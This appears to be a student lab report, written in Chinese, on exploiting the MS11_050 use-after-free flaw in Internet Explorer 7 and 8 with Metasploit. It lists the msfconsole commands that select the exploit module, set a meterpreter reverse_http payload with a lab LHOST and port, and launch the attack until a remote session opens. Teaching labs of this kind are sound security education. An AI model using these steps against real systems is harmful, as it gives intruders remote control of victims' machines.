20145335郝昊《网络攻防》Exp4 MS11_050
实验内容
-
初步掌握平台matesploit的使用
-
了解漏洞MS11_050漏洞:
use-after-free
漏洞,即对象被释放之后,对应指针并没有被置为NULL,被释放的内存中的数据可能会被其他对象的函数非法调用 -
影响范围:IE7 和IE 8 其他的版本好像并不存在这个漏洞。
实验步骤
-
使用命令
msfconsole
命令进入控制台 -
使用命令
search ms11_050
查看针对MS11_050漏洞的攻击模块
-
确定相应模块名之后,我们使用该模块。使用命令
use exploit/windows/browser/ms11_050_mshtml_cobjectelement
进入模块 -
使用命令
info
查看该模块的具体信息(可见其可用范围,针对浏览器IE 7,IE 8可用,其中又分该目标机是否开启了DEP数据保护)
-
之后需要设置paylaods,我们选择了windows/meterpreter/reverse_http该payload会返回一个遵循http协议的shell,我们以此来获得目标主机系统权限。使用命令
set payloads windows/meterpreter/reverse_http
-
并使用show optoions 查看具体参数设置。
-
并进行设置其相关参数。(命令如下)
set LHOST 192.168.199.129 set LPORT 5335 set URIPATH 20145335HH
-
之后使用命令
exploit
攻击,等待连接,漏洞主机访问该ip,ie浏览器发生溢出,此时,攻击端显示创建了一个ID为1的会话(session)